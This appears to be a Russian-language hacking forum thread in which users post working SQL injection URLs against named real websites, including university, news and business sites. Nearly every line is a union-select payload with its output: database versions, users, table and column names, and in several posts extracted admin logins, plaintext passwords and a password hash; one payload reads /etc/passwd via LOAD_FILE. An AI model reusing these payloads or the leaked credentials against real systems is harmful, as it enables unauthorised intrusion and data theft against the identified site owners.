ООО “РостИнвестЛизинг” — cовместно с Западно-Уральским банком Сбербанка РФ инвестирует свыше 200 предприятий. Code: http://ril.ru/news/?id=30+and+1=0+union+select+1,2,version(),4,5,6,7--
скуль: Code: http://www.learnbirdsongs.com/birdsong.php?id=-5+union+select+1,2,3,4,5,6,7,8,9-- версия: Code: http://www.learnbirdsongs.com/birdsong.php?id=-5+union+select+1,2,3,4,version(),6,7,8,9-- 5.0.27 таблицы выводятся limit'om: Code: http://www.learnbirdsongs.com/birdsong.php?id=-5+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables-- infa: Code: http://www.learnbirdsongs.com/birdsong.php?id=-5+union+select+1,2,3,4,concat_ws(0x3a,user(),database()),6,7,8,9-- user() webtoad@localhost database() jfdavis_webtoad
Code: http://www.design.ucla.edu/people/grad.php?ID=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version()),9,10,11 [email protected]:dma:5.0.45 ПС: Ачат теперь стал ин реинбов стайл?
http://goglobal.fiu.edu Code: http://goglobal.fiu.edu/news.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,19,11,12/* 4.1.14-nt:goglobal:[email protected]
скуль: Code: http://www.aroma.us/info_page.php?id=-5+union+select+1,2,3,4,5-- версия: Code: http://www.aroma.us/info_page.php?id=-5+union+select+1,2,version(),4,5-- 5.0.67 таблицы выводятся limit'om: Code: http://www.aroma.us/info_page.php?id=-5+union+select+1,2,table_name,4,5+from+information_schema.tables-- infa: Code: http://www.aroma.us/info_page.php?id=-5+union+select+1,2,concat_ws(0x3a,user(),database()),4,5-- user() aroma15_aromasho@localhost database() aroma15_aromaonline
Пензенский Региональный Центр Интернет Образования тИЦ: 325 PR: 4 Code: http://rcio.pnzgu.ru/grad.php?id=4801 Блинд, т.к. третяя ветка - юниона нету... fio@localhost - User fio - DB 3.23.58 - Version
скуль: Code: http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,2,3,4,5,6,7,8-- версия: Code: http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,version(),3,4,5,6,7,8-- 5.0.24 список таблиц: Code: http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables-- видим таблицу login список столбцов: Code: http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,column_name,3,4,5,6,7,8+from+information_schema.columns-- видим стобцы: user и pass выводим инфу: user: Code: http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,user,3,4,5,6,7,8+from+login-- pass: Code: http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,pass,3,4,5,6,7,8+from+login-- infa: user: exhibit001 pass: ireland2 админку не нашёл =((((((((
http://www.vdostudio.com Code: http://www.vdostudio.com/webboard/view.php?id=-1+union+select+1,2,3,4,5,6,7,8/* version() - 5.0.22 database() - vdostudio
Code: http://www.tepg.se/showtitle.php?id=-1+union+all+select+0,1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5-- юзер/бд/версия: Code: [email protected] : wonderwork_db1 : 5.0.51a-24-log Админ: Code: http://www.tepg.se/showtitle.php?id=-1+union+all+select+0,1,CONCAT_WS(CHAR(32,58,32),id,username,password),3,4,5+from+admin-- ид/логин/пасс: Code: 1 : hdnine : cb7ea8e5ad69ce0be6c3f1f0032dad4a
nfca.org(with file_priv) pr - 6: PHP: http://www.nfca.org/top25/index.php?cat_id=1&poll_id=-234271+union+select+1,2,3,4,5,concat_ws(0x3A,user(),version(),database()),LOAD_FILE(0x2f6574632f706173737764),8--+ [email protected]:4.0.24-log:ism_data_nfca
Code: http://www.autokom.cz/newsdetail.php?id=-1+union+all+select+0,1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6-- юзер/бд/версия: Code: www_autokom_cz@localhost : www_autokom_cz : 5.0.45
Code: http://www.black-time.net/usr.php?act=com&id_obj=-1+union+select+1,2,3,4,5,6,UNHEX(HEX(concat_ws(0x3a,user(),database(),version()))),8,9,10,11,12,13,14 [email protected]:black-time:4.1.8-standard
http://www.ftlauderdalenews.net (PR3) Code: http://www.ftlauderdalenews.net/news.php?id=1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8+from+users/* 4.1.20-max-logromena_news[email protected] Code: http://www.ftlauderdalenews.net/news.php?id=1+union+select+1,2,3,concat_ws(0x3a,password,name),5,6,7,8+from+users/* name : Ray Brasted password : 1x2y3z
Code: http://www.cfs-nl.ca/media-read.php?id=-1+union+all+select+0,1,2,3,4,5,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),7,8,9,10,11,12-- user/db/version: Code: cfsnl_admin@localhost : cfsnl_admin_old : 5.0.45-log
cialis-cialis.com HTML: http://www.cialis-cialis.com/art.php?id=-29%20union%20select%201,2,unhex(hex(concat_ws(0x3a,version(),user(),database()))),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 4.1.10-standard:poppen_shop3@localhost:poppen_shop3 В австрийском гугле стоит по хорошим запросам =) ____________________________________________ Code: [SIZE=3][COLOR=DarkGreen]http://www.talkeetnachamber.org PR4[/COLOR][/SIZE] http://www.talkeetnachamber.org/news.php?id=-11%20union%20select%201,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,0,1 [B]5.0.51a-log:talkeetn_db01:[email protected][/B] Существует интересная табличка с данными для подключения к БД http://www.talkeetnachamber.org/news.php?id=-11%20union%20select%201,2,3,group_concat(column_name),5,6,7,8,9,0,1%20from%20information_schema.columns%20where%20table_name=0x7068704d795365617263685f73657474696e6773 Действуем =) http://www.talkeetnachamber.org/news.php?id=-11%20union%20select%201,2,3,concat_ws(0x3a3a3a,DBName,DBUser,DBPassword,DBHost),5,6,7,8,9,0,1%20from%20phpMySearch_settings [I]DBName,DBUser,DBPassword,DBHost[/I] talkeetn_db01:::talkeetn_db01:::freckles:::localhost
[PR 4] Code: http://www.golf-in-japan.com/prefcourses/data.php?ID=-178+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- 4.0.27-log:golfinja:[email protected] [PR 0] Code: http://www.okna-astem.ru/data.php?id=-6+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 5.0.51a-community:db_oknaastem1knaastem1@localhost
http://www.cash.ge/doors.php?id=1'+union+select+1,2,concat_ws(0x3a,version(),da tabase(),u ser()),4/*&lang=eng 4.1.22-standard:cashge_aks:cashge_aks@localhost ------------------------------------------------------------------------ Грузинский сайт про что то там http://www.muskie.ge/acus.php?lan_id=1&id=-1+union+select+1,2,concat_ws(0x3a,ver sion(),databa se(),user()),4,5-- 4.0.27:muskie_ge:muskie_ge@localhost PR: 2 ------------------------------------------------------------------------ http://mitex.ge/index.php?lang=eng&request=news&id=-1+union+select+1,concat_ws(0x3a,version(),data base(),us er()),3,4,5-- 4.1.7-max-log:mitex:mitex@localhost
Code: http://acthra.anu.edu.au/cases/case.php?id=86 Blind - union почему-то не пашет. V: 5.0.45-log U: [email protected] DB: regent_acthra
Code: http://www.tosport.ru/detail_1247'.html Code: http://www.tosport.ru/detail_-1247.html/**/union/**/select/**/1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/from/**/information_schema.tables-- C неё берём таблицу cizar_admin смотрим её содержимое: Code: http://www.tosport.ru/detail_-1247.html/**/union/**/select/**/1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/from/**/information_schema.columns/**/where/**/table_name=0x63697a61725f61646d696e-- Code: id,access,login,password,name,position,address,phone,email,description,pactive,menu_access Дальше либо я туплю, либо...кароче вывод не получается Данные бд: Code: http://www.tosport.ru/detail_-1247.html/**/union/**/select/**/1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
Опять грузия http://www.webmix.ge/g_viewweb.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,concat_ws(0x3a,version(),datab ase(),us er()),40-- 5.0.75-community-log:webmixin_portfolio:webmixin_portfol@localhost ТИЦ: 20 PR: 5
